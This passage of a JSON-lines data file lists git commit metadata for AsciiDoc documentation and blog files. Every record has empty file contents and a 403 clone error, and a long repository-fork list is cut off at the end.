2017-07-07-Payment-Request-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-07-Payment-Request-A-P-I.adoc","new_file":"_posts\/2017-07-07-Payment-Request-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d34533e70924dc9d5817b30d6b715c354273bb2","subject":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","message":"Update 2015-10-12-Four-Acts-of-Citizenry.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_file":"_posts\/2015-10-12-Four-Acts-of-Citizenry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da6e187b21f3a8475f47b5a1ac7225859f7e8ac2","subject":"Update 2016-06-16-Some-thoughts-on-L-S-H.adoc","message":"Update 2016-06-16-Some-thoughts-on-L-S-H.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-06-16-Some-thoughts-on-L-S-H.adoc","new_file":"_posts\/2016-06-16-Some-thoughts-on-L-S-H.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a4f38675335d2a50026fabffc33768c730fdcb7","subject":"Update 2016-07-16-Test-My-New-Shiny-Blog.adoc","message":"Update 2016-07-16-Test-My-New-Shiny-Blog.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-07-16-Test-My-New-Shiny-Blog.adoc","new_file":"_posts\/2016-07-16-Test-My-New-Shiny-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecf1ebc6959a1ed9937f93ea482a54e3cd8e9765","subject":"add news item","message":"add news item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/01\/26\/clojure1-10-2.adoc","new_file":"content\/news\/2021\/01\/26\/clojure1-10-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"316f680b0aef5e6aabc74ba00eb7bc935e4f22ea","subject":"Renamed '_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc' to '_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc'","message":"Renamed '_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc' to '_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc'","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc","new_file":"_posts\/2014-01-01-Privacy-Policy-for-coders-Dilemma.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65435ab611ba6aa200879b5b5c70a0a388c58422","subject":"Update 2015-06-15-collectionview-layout-by-tutorial.adoc","message":"Update 2015-06-15-collectionview-layout-by-tutorial.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-06-15-collectionview-layout-by-tutorial.adoc","new_file":"_posts\/2015-06-15-collectionview-layout-by-tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae4ab05a6215fd0a859adde40dac6afa8bf0f950","subject":"doc: napatech release notes update","message":"doc: napatech release notes update\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b3290798b62390a7200fa57615c0ef9287d58d3","subject":"Update 2017-07-20-Thursday-July-20-2017.adoc","message":"Update 2017-07-20-Thursday-July-20-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-20-Thursday-July-20-2017.adoc","new_file":"_posts\/2017-07-20-Thursday-July-20-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"487be07fd4709f4fc4a852704e170d53602df91a","subject":"Update 2019-01-31-Change-Remote-URL-Git.adoc","message":"Update 2019-01-31-Change-Remote-URL-Git.adoc","repos":"alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io,alimasyhur\/alimasyhur.github.io","old_file":"_posts\/2019-01-31-Change-Remote-URL-Git.adoc","new_file":"_posts\/2019-01-31-Change-Remote-URL-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alimasyhur\/alimasyhur.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"169fcb1db01757bc225edafed969f6b43d5a582a","subject":"y2b create post Sony AX100 4K Camcorder Hands-On! (CES 2014)","message":"y2b create post Sony AX100 4K Camcorder Hands-On! (CES 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-08-Sony-AX100-4K-Camcorder-HandsOn-CES-2014.adoc","new_file":"_posts\/2014-01-08-Sony-AX100-4K-Camcorder-HandsOn-CES-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"170ddb052b8dee1538ea503b5f2ad7cb85636952","subject":"Update 2015-09-22-worst_point_of_india.adoc","message":"Update 2015-09-22-worst_point_of_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-22-worst_point_of_india.adoc","new_file":"_posts\/2015-09-22-worst_point_of_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8ceb7679a5ed54530d0772ca723c4edf732e79b","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3fd37c6f0c0c01ab7561af8680b422b29aa73f4","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a45a202d9903ac8fdd541805fae577dc3a13532f","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae6137f79fdcbc450f1d6bc8b71d0600c6175ad","subject":"Added opcodes.asciidoc","message":"Added opcodes.asciidoc\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"Doc\/opcodes.asciidoc","new_file":"Doc\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab2c2d18d11bf0ebbead2f43efeeb03b9b7d3672","subject":"Added IoCs for Kimsuky's HotDoge case","message":"Added IoCs for Kimsuky's HotDoge case\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"kimsuky\/hotdoge_donutcat_case\/README.adoc","new_file":"kimsuky\/hotdoge_donutcat_case\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"558b6009fcda90cd0e7fe3c421c5ae3e2338209b","subject":"Adding initial recommendations on associations","message":"Adding initial recommendations on associations\n","repos":"ldebello\/javacuriosities,ldebello\/java-advanced,ldebello\/javacuriosities,ldebello\/javacuriosities","old_file":"Hibernate\/HibernateAssociations\/README.adoc","new_file":"Hibernate\/HibernateAssociations\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldebello\/javacuriosities.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf754daf9d435f7507483c81475e4cabbeca36ad","subject":"Add document header","message":"Add document header\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1a5bbbbfb9c6145f9c4853ce35cc3816a2c4d652","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5c716079c4afaed91f41f57a28a064345e985a1","subject":"Create 2015-03-19-forge-2.15.2.final.asciidoc","message":"Create 2015-03-19-forge-2.15.2.final.asciidoc","repos":"luiz158\/docs,addonis1990\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs","old_file":"news\/ 2015-03-19-forge-2.15.2.final.asciidoc","new_file":"news\/ 2015-03-19-forge-2.15.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f2e5033d0c28498c2da4914cd7d03f4214ba3e5f","subject":"Added Boxfuse + AWS deployment information","message":"Added Boxfuse + AWS deployment information","repos":"axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot,axelfontaine\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axelfontaine\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a2373921102b1dd7d2379e9057df45747ae79f0","subject":"Update store.asciidoc (#21353)","message":"Update store.asciidoc (#21353)\n\n* Update store.asciidoc\r\n\r\n* Update store.asciidoc\r\n\r\n* Update store.asciidoc\r\n","repos":"nilabhsagar\/elasticsearch,njlawton\/elasticsearch,JackyMai\/elasticsearch,fforbeck\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,StefanGor\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,winstonewert\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,nilabhsagar\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,elasticdog\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsearch,Shepard1212\/elasticsearch,i-am-Nathan\/elasticsearch,maddin2016\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,JervyShi\/elasticsearch,LewayneNaidoo\/elasticsearch,vroyer\/elasticassandra,JackyMai\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,MisterAndersen\/elasticsearch,bawse\/elasticsearch,mortonsykes\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,nknize\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,yanjunh\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,njlawton\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,MaineC\/elasticsearch,wenpos\/elasticsearch,yanjunh\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,a2lin\/elasticsearch,yanjunh\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,henakamaMSFT\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,mjason3\/elasticsearch,bawse\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,spiegela\/elasticsearch,fernandozhu\/elasticsearch,yanjunh\/elasticsearch,GlenRSmith\/elasticsearch,wuranbo\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,JSCooke\/elasticsearch,MisterAndersen\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,masaruh\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,spiegela\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,mortonsykes\/elasticsearch,JSCooke\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,bawse\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,pozhidaevak\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,henakamaMSFT\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra","old_file":"docs\/reference\/index-modules\/store.asciidoc","new_file":"docs\/reference\/index-modules\/store.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5aa84c9aaba0813e07abfabf3f9edd4c60b4a78e","subject":"[DOCS] Fixed typos in aggregations.asciidoc","message":"[DOCS] Fixed typos in aggregations.asciidoc\n\nFix plural\/singular forms.\n","repos":"wenpos\/elasticsearch,hafkensite\/elasticsearch,kenshin233\/elasticsearch,tkssharma\/elasticsearch,mcku\/elasticsearch,LewayneNaidoo\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,Flipkart\/elasticsearch,sc0ttkclark\/elasticsearch,markharwood\/elasticsearch,xpandan\/elasticsearch,Liziyao\/elasticsearch,franklanganke\/elasticsearch,wittyameta\/elasticsearch,feiqitian\/elasticsearch,i-am-Nathan\/elasticsearch,mnylen\/elasticsearch,iamjakob\/elasticsearch,ydsakyclguozi\/elasticsearch,mapr\/elasticsearch,karthikjaps\/elasticsearch,mbrukman\/elasticsearch,mjhennig\/elasticsearch,Charlesdong\/elasticsearch,palecur\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,Brijeshrpatel9\/elasticsearch,beiske\/elasticsearch,amaliujia\/elasticsearch,jaynblue\/elasticsearch,IanvsPoplicola\/elasticsearch,rento19962\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,wangtuo\/elasticsearch,JSCooke\/elasticsearch,kkirsche\/elasticsearch,Ansh90\/elasticsearch,ivansun1010\/elasticsearch,KimTaehee\/elasticsearch,truemped\/elasticsearch,alexbrasetvik\/elasticsearch,abibell\/elasticsearch,zhaocloud\/elasticsearch,franklanganke\/elasticsearch,VukDukic\/elasticsearch,Stacey-Gammon\/elasticsearch,rento19962\/elasticsearch,kevinkluge\/elasticsearch,btiernay\/elasticsearch,ImpressTV\/elasticsearch,MichaelLiZhou\/elasticsearch,mkis-\/elasticsearch,alexkuk\/elasticsearch,Rygbee\/elasticsearch,kaneshin\/elasticsearch,nellicus\/elasticsearch,lks21c\/elasticsearch,Charlesdong\/elasticsearch,nazarewk\/elasticsearch,djschny\/elasticsearch,cnfire\/elasticsearch-1,tahaemin\/elasticsearch,milodky\/elasticsearch,mrorii\/elasticsearch,brandonkearby\/elasticsearch,ivansun1010\/elasticsearch,brandonkearby\/elasticsearch,knight1128\/elasticsearch,camilojd\/elasticsearch,obourgain\/elasticsearch,Shekharrajak\/elasticsearch,MjAbuz\/elasticsearch,socialrank\/elasticsearch,tahaemin\/elasticsearch,milodky\/elasticsearch,MichaelLiZhou\/elasticsearch,AshishThakur\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,petmit\/elasticsearch,micpalmia\/elasticsearch,vingupta3\/elasticsearch,kimimj\/elasticsearch,rlugojr\/elasticsearch,shreejay\/elasticsearch,dylan8902\/elasticsearch,bestwpw\/elasticsearch,djschny\/elasticsearch,codebunt\/elasticsearch,jango2015\/elasticsearch,pozhidaevak\/elasticsearch,Rygbee\/elasticsearch,xingguang2013\/elasticsearch,micpalmia\/elasticsearch,petabytedata\/elasticsearch,himanshuag\/elasticsearch,dataduke\/elasticsearch,queirozfcom\/elasticsearch,nrkkalyan\/elasticsearch,shreejay\/elasticsearch,springning\/elasticsearch,Siddartha07\/elasticsearch,HonzaKral\/elasticsearch,PhaedrusTheGreek\/elasticsearch,petmit\/elasticsearch,Fsero\/elasticsearch,wuranbo\/elasticsearch,dataduke\/elasticsearch,wittyameta\/elasticsearch,henakamaMSFT\/elasticsearch,Rygbee\/elasticsearch,trangvh\/elasticsearch,fernandozhu\/elasticsearch,Collaborne\/elasticsearch,strapdata\/elassandra-test,lchennup\/elasticsearch,feiqitian\/elasticsearch,sarwarbhuiyan\/elasticsearch,caengcjd\/elasticsearch,micpalmia\/elasticsearch,clintongormley\/elasticsearch,skearns64\/elasticsearch,Fsero\/elasticsearch,amit-shar\/elasticsearch,socialrank\/elasticsearch,liweinan0423\/elasticsearch,sdauletau\/elasticsearch,abhijitiitr\/es,loconsolutions\/elasticsearch,davidvgalbraith\/elasticsearch,qwerty4030\/elasticsearch,mgalushka\/elasticsearch,TonyChai24\/ESSource,alexbrasetvik\/elasticsearch,wimvds\/elasticsearch,bestwpw\/elasticsearch,PhaedrusTheGreek\/elasticsearch,wayeast\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra-test,jimczi\/elasticsearch,kubum\/elasticsearch,likaiwalkman\/elasticsearch,jimczi\/elasticsearch,zhaocloud\/elasticsearch,umeshdangat\/elasticsearch,lightslife\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,heng4fun\/elasticsearch,pablocastro\/elasticsearch,Kakakakakku\/elasticsearch,rhoml\/elasticsearch,ricardocerq\/elasticsearch,markllama\/elasticsearch,sposam\/elasticsearch,wbowling\/elasticsearch,ivansun1010\/elasticsearch,schonfeld\/elasticsearch,nknize\/elasticsearch,pritishppai\/elasticsearch,anti-social\/elasticsearch,apepper\/elasticsearch,jaynblue\/elasticsearch,achow\/elasticsearch,pozhidaevak\/elasticsearch,mjhennig\/elasticsearch,Fsero\/elasticsearch,lmtwga\/elasticsearch,petmit\/elasticsear